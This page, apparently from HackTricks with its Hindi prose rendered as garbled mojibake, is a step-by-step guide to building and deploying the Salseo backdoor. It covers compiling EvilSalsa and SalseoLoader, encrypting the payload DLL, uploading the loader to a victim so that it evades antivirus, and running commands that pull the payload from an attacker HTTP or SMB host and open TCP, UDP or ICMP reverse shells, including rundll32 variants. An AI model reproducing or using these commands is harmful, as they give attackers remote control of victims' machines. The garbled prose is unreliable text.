12 KiB
Salseo
{% hint style="success" %}
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the ЁЯТм Discord group or the telegram group or follow us on Twitter ЁЯРж @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
рдмрд╛рдЗрдирд░реА рд╕рдВрдХрд▓рди рдХрд░рдирд╛
рдЧрд┐рдЯрд╣рдм рд╕реЗ рд╕реНрд░реЛрдд рдХреЛрдб рдбрд╛рдЙрдирд▓реЛрдб рдХрд░реЗрдВ рдФрд░ EvilSalsa рдФрд░ SalseoLoader рд╕рдВрдХрд▓рд┐рдд рдХрд░реЗрдВред рдЖрдкрдХреЛ рдХреЛрдб рд╕рдВрдХрд▓рд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП Visual Studio рд╕реНрдерд╛рдкрд┐рдд рдХрд░рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реЛрдЧреАред
рдЙрди рдкрд░рд┐рдпреЛрдЬрдирд╛рдУрдВ рдХреЛ рдЙрд╕ рд╡рд┐рдВрдбреЛрдЬ рдмреЙрдХреНрд╕ рдХреА рдЖрд░реНрдХрд┐рдЯреЗрдХреНрдЪрд░ рдХреЗ рд▓рд┐рдП рд╕рдВрдХрд▓рд┐рдд рдХрд░реЗрдВ рдЬрд╣рд╛рдБ рдЖрдк рдЙрдирдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдиреЗ рдЬрд╛ рд░рд╣реЗ рд╣реИрдВ (рдпрджрд┐ рд╡рд┐рдВрдбреЛрдЬ x64 рдХрд╛ рд╕рдорд░реНрдерди рдХрд░рддрд╛ рд╣реИ рддреЛ рдЙрдиреНрд╣реЗрдВ рдЙрд╕ рдЖрд░реНрдХрд┐рдЯреЗрдХреНрдЪрд░ рдХреЗ рд▓рд┐рдП рд╕рдВрдХрд▓рд┐рдд рдХрд░реЗрдВ)ред
рдЖрдк Visual Studio рдореЗрдВ рдмрд╛рдПрдБ "Build" рдЯреИрдм рдореЗрдВ "Platform Target" рдХреЗ рдЕрдВрджрд░ рдЖрд░реНрдХрд┐рдЯреЗрдХреНрдЪрд░ рдХрд╛ рдЪрдпрди рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред
(**рдпрджрд┐ рдЖрдк рдпреЗ рд╡рд┐рдХрд▓реНрдк рдирд╣реАрдВ рдкрд╛ рд░рд╣реЗ рд╣реИрдВ рддреЛ "Project Tab" рдкрд░ рдХреНрд▓рд┐рдХ рдХрд░реЗрдВ рдФрд░ рдлрд┐рд░ "<Project Name> Properties" рдкрд░ рдХреНрд▓рд┐рдХ рдХрд░реЗрдВ)
рдлрд┐рд░, рджреЛрдиреЛрдВ рдкрд░рд┐рдпреЛрдЬрдирд╛рдУрдВ рдХрд╛ рдирд┐рд░реНрдорд╛рдг рдХрд░реЗрдВ (Build -> Build Solution) (рд▓реЙрдЧ рдХреЗ рдЕрдВрджрд░ рдирд┐рд╖реНрдкрд╛рджрди рдпреЛрдЧреНрдп рдХрд╛ рдкрде рджрд┐рдЦрд╛рдИ рджреЗрдЧрд╛):
рдмреИрдХрдбреЛрд░ рддреИрдпрд╛рд░ рдХрд░реЗрдВ
рд╕рдмрд╕реЗ рдкрд╣рд▓реЗ, рдЖрдкрдХреЛ EvilSalsa.dll рдХреЛ рдПрдиреНрдХреЛрдб рдХрд░рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реЛрдЧреАред рдРрд╕рд╛ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рдЖрдк рдкрд╛рдпрдерди рд╕реНрдХреНрд░рд┐рдкреНрдЯ encrypterassembly.py рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдпрд╛ рдЖрдк рдкрд░рд┐рдпреЛрдЬрдирд╛ EncrypterAssembly рдХреЛ рд╕рдВрдХрд▓рд┐рдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:
Python
python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
рд╡рд┐рдВрдбреЛрдЬ
EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt
рдареАрдХ рд╣реИ, рдЕрдм рдЖрдкрдХреЗ рдкрд╛рд╕ Salseo рдЪреАрдЬрд╝реЛрдВ рдХреЛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЖрд╡рд╢реНрдпрдХ рд╕рднреА рдЪреАрдЬрд╝реЗрдВ рд╣реИрдВ: encoded EvilDalsa.dll рдФрд░ SalseoLoader рдХрд╛ рдмрд╛рдЗрдирд░реАред
SalseoLoader.exe рдмрд╛рдЗрдирд░реА рдХреЛ рдорд╢реАрди рдкрд░ рдЕрдкрд▓реЛрдб рдХрд░реЗрдВред рдЙрдиреНрд╣реЗрдВ рдХрд┐рд╕реА рднреА AV рджреНрд╡рд╛рд░рд╛ рдирд╣реАрдВ рдкрд╣рдЪрд╛рдирд╛ рдЬрд╛рдирд╛ рдЪрд╛рд╣рд┐рдП...
рдмреИрдХрдбреЛрд░ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░реЗрдВ
TCP рд░рд┐рд╡рд░реНрд╕ рд╢реЗрд▓ рдкреНрд░рд╛рдкреНрдд рдХрд░рдирд╛ (HTTP рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдПрдиреНрдХреЛрдбреЗрдб dll рдбрд╛рдЙрдирд▓реЛрдб рдХрд░рдирд╛)
рдпрд╛рдж рд░рдЦреЗрдВ рдХрд┐ рд░рд┐рд╡рд░реНрд╕ рд╢реЗрд▓ рд▓рд┐рд╕реНрдирд░ рдХреЗ рд░реВрдк рдореЗрдВ nc рд╢реБрд░реВ рдХрд░реЗрдВ рдФрд░ рдПрдиреНрдХреЛрдбреЗрдб evilsalsa рдХреЛ рд╕рд░реНрд╡ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдПрдХ HTTP рд╕рд░реНрд╡рд░ рд╢реБрд░реВ рдХрд░реЗрдВред
SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>
UDP рд░рд┐рд╡рд░реНрд╕ рд╢реЗрд▓ рдкреНрд░рд╛рдкреНрдд рдХрд░рдирд╛ (SMB рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдПрдиреНрдХреЛрдбреЗрдб dll рдбрд╛рдЙрдирд▓реЛрдб рдХрд░рдирд╛)
рдпрд╛рдж рд░рдЦреЗрдВ рдХрд┐ рд░рд┐рд╡рд░реНрд╕ рд╢реЗрд▓ рд▓рд┐рд╕реНрдирд░ рдХреЗ рд░реВрдк рдореЗрдВ рдПрдХ nc рд╢реБрд░реВ рдХрд░реЗрдВ, рдФрд░ рдПрдиреНрдХреЛрдбреЗрдб evilsalsa (impacket-smbserver) рдХреЛ рд╕реЗрд╡рд╛ рджреЗрдиреЗ рдХреЗ рд▓рд┐рдП рдПрдХ SMB рд╕рд░реНрд╡рд░ рд╢реБрд░реВ рдХрд░реЗрдВред
SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>
ICMP рд░рд┐рд╡рд░реНрд╕ рд╢реЗрд▓ рдкреНрд░рд╛рдкреНрдд рдХрд░рдирд╛ (рд╡рд┐рдХреНрдЯрд┐рдо рдХреЗ рдЕрдВрджрд░ рдкрд╣рд▓реЗ рд╕реЗ рдПрдиреНрдХреЛрдбреЗрдб dll)
рдЗрд╕ рдмрд╛рд░ рдЖрдкрдХреЛ рдХреНрд▓рд╛рдЗрдВрдЯ рдореЗрдВ рд░рд┐рд╡рд░реНрд╕ рд╢реЗрд▓ рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдПрдХ рд╡рд┐рд╢реЗрд╖ рдЙрдкрдХрд░рдг рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИред рдбрд╛рдЙрдирд▓реЛрдб рдХрд░реЗрдВ: https://github.com/inquisb/icmpsh
ICMP рдЙрддреНрддрд░ рдмрдВрдж рдХрд░реЗрдВ:
sysctl -w net.ipv4.icmp_echo_ignore_all=1
#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0
рдХреНрд▓рд╛рдЗрдВрдЯ рдХреЛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░реЗрдВ:
python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"
рдкреАрдбрд╝рд┐рдд рдХреЗ рдЕрдВрджрд░, рдЪрд▓реЛ salseo рдЪреАрдЬрд╝ рдХреЛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рддреЗ рд╣реИрдВ:
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>
SalseoLoader рдХреЛ DLL рдХреЗ рд░реВрдк рдореЗрдВ рд╕рдВрдХрд▓рд┐рдд рдХрд░рдирд╛ рдореБрдЦреНрдп рдлрд╝рдВрдХреНрд╢рди рдирд┐рд░реНрдпрд╛рдд рдХрд░ рд░рд╣рд╛ рд╣реИ
Visual Studio рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ SalseoLoader рдкреНрд░реЛрдЬреЗрдХреНрдЯ рдЦреЛрд▓реЗрдВред
рдореБрдЦреНрдп рдлрд╝рдВрдХреНрд╢рди рд╕реЗ рдкрд╣рд▓реЗ рдЬреЛрдбрд╝реЗрдВ: [DllExport]
рдЗрд╕ рдкреНрд░реЛрдЬреЗрдХреНрдЯ рдХреЗ рд▓рд┐рдП DllExport рд╕реНрдерд╛рдкрд┐рдд рдХрд░реЗрдВ
Tools --> NuGet Package Manager --> Manage NuGet Packages for Solution...
DllExport рдкреИрдХреЗрдЬ рдХреЗ рд▓рд┐рдП рдЦреЛрдЬреЗрдВ (Browse рдЯреИрдм рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реБрдП), рдФрд░ Install рджрдмрд╛рдПрдВ (рдФрд░ рдкреЙрдкрдЕрдк рдХреЛ рд╕реНрд╡реАрдХрд╛рд░ рдХрд░реЗрдВ)
рдЖрдкрдХреЗ рдкреНрд░реЛрдЬреЗрдХреНрдЯ рдлрд╝реЛрд▓реНрдбрд░ рдореЗрдВ рдлрд╝рд╛рдЗрд▓реЗрдВ рдкреНрд░рдХрдЯ рд╣реБрдИ рд╣реИрдВ: DllExport.bat рдФрд░ DllExport_Configure.bat
Uninstall DllExport
Uninstall рджрдмрд╛рдПрдВ (рд╣рд╛рдБ, рдпрд╣ рдЕрдЬреАрдм рд╣реИ рд▓реЗрдХрд┐рди рдореБрдЭ рдкрд░ рд╡рд┐рд╢реНрд╡рд╛рд╕ рдХрд░реЗрдВ, рдпрд╣ рдЖрд╡рд╢реНрдпрдХ рд╣реИ)
Visual Studio рд╕реЗ рдмрд╛рд╣рд░ рдирд┐рдХрд▓реЗрдВ рдФрд░ DllExport_configure рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░реЗрдВ
рдмрд╕ рдмрд╛рд╣рд░ рдирд┐рдХрд▓реЗрдВ Visual Studio
рдлрд┐рд░, рдЕрдкрдиреЗ SalseoLoader рдлрд╝реЛрд▓реНрдбрд░ рдкрд░ рдЬрд╛рдПрдВ рдФрд░ DllExport_Configure.bat рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░реЗрдВ
x64 рдЪреБрдиреЗрдВ (рдпрджрд┐ рдЖрдк рдЗрд╕реЗ x64 рдмреЙрдХреНрд╕ рдХреЗ рдЕрдВрджрд░ рдЙрдкрдпреЛрдЧ рдХрд░рдиреЗ рдЬрд╛ рд░рд╣реЗ рд╣реИрдВ, рддреЛ рдпрд╣ рдореЗрд░рд╛ рдорд╛рдорд▓рд╛ рдерд╛), System.Runtime.InteropServices рдЪреБрдиреЗрдВ ( DllExport рдХреЗ рд▓рд┐рдП Namespace рдХреЗ рдЕрдВрджрд░) рдФрд░ Apply рджрдмрд╛рдПрдВ
Visual Studio рдХреЗ рд╕рд╛рде рдкреНрд░реЛрдЬреЗрдХреНрдЯ рдлрд┐рд░ рд╕реЗ рдЦреЛрд▓реЗрдВ
[DllExport] рдЕрдм рддреНрд░реБрдЯрд┐ рдХреЗ рд░реВрдк рдореЗрдВ рдЪрд┐рд╣реНрдирд┐рдд рдирд╣реАрдВ рд╣реЛрдирд╛ рдЪрд╛рд╣рд┐рдП
рд╕рдорд╛рдзрд╛рди рдХрд╛ рдирд┐рд░реНрдорд╛рдг рдХрд░реЗрдВ
Output Type = Class Library рдЪреБрдиреЗрдВ (Project --> SalseoLoader Properties --> Application --> Output type = Class Library)
x64 рдкреНрд▓реЗрдЯрдлрд╝реЙрд░реНрдо рдЪреБрдиреЗрдВ (Project --> SalseoLoader Properties --> Build --> Platform target = x64)
рд╕рдорд╛рдзрд╛рди рдмрдирд╛рдиреЗ рдХреЗ рд▓рд┐рдП: Build --> Build Solution (Output рдХрдВрд╕реЛрд▓ рдХреЗ рдЕрдВрджрд░ рдирдП DLL рдХрд╛ рдкрде рджрд┐рдЦрд╛рдИ рджреЗрдЧрд╛)
рдЙрддреНрдкрдиреНрди Dll рдХрд╛ рдкрд░реАрдХреНрд╖рдг рдХрд░реЗрдВ
Dll рдХреЛ рдЙрд╕ рд╕реНрдерд╛рди рдкрд░ рдХреЙрдкреА рдФрд░ рдкреЗрд╕реНрдЯ рдХрд░реЗрдВ рдЬрд╣рд╛рдБ рдЖрдк рдЗрд╕рдХрд╛ рдкрд░реАрдХреНрд╖рдг рдХрд░рдирд╛ рдЪрд╛рд╣рддреЗ рд╣реИрдВред
рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░реЗрдВ:
rundll32.exe SalseoLoader.dll,main
рдпрджрд┐ рдХреЛрдИ рддреНрд░реБрдЯрд┐ рдирд╣реАрдВ рдЖрддреА рд╣реИ, рддреЛ рд╢рд╛рдпрдж рдЖрдкрдХреЗ рдкрд╛рд╕ рдПрдХ рдХрд╛рд░реНрдпрд╛рддреНрдордХ DLL рд╣реИ!!
DLL рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдПрдХ рд╢реЗрд▓ рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ
HTTP рд╕рд░реНрд╡рд░ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛ рди рднреВрд▓реЗрдВ рдФрд░ рдПрдХ nc рд╢реНрд░реЛрддрд╛ рд╕реЗрдЯ рдХрд░реЗрдВ
рдкреЙрд╡рд░рд╢реЗрд▓
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main
CMD
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
{% hint style="success" %}
AWS рд╣реИрдХрд┐рдВрдЧ рд╕реАрдЦреЗрдВ рдФрд░ рдЕрднреНрдпрд╛рд╕ рдХрд░реЗрдВ:HackTricks Training AWS Red Team Expert (ARTE)
GCP рд╣реИрдХрд┐рдВрдЧ рд╕реАрдЦреЗрдВ рдФрд░ рдЕрднреНрдпрд╛рд╕ рдХрд░реЗрдВ: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks рдХрд╛ рд╕рдорд░реНрдерди рдХрд░реЗрдВ
- рд╕рджрд╕реНрдпрддрд╛ рдпреЛрдЬрдирд╛рдПрдБ рджреЗрдЦреЗрдВ!
- рд╣рдорд╛рд░реЗ ЁЯТм Discord рд╕рдореВрд╣ рдпрд╛ telegram рд╕рдореВрд╣ рдореЗрдВ рд╢рд╛рдорд┐рд▓ рд╣реЛрдВ рдпрд╛ рд╣рдорд╛рд░реЗ Twitter ЁЯРж @hacktricks_live** рдХрд╛ рдкрд╛рд▓рди рдХрд░реЗрдВред**
- рд╣реИрдХрд┐рдВрдЧ рдЯреНрд░рд┐рдХреНрд╕ рд╕рд╛рдЭрд╛ рдХрд░реЗрдВ рдФрд░ HackTricks рдФрд░ HackTricks Cloud github рд░рд┐рдкреЛрдЬрд┐рдЯрд░реА рдореЗрдВ PRs рд╕рдмрдорд┐рдЯ рдХрд░реЗрдВред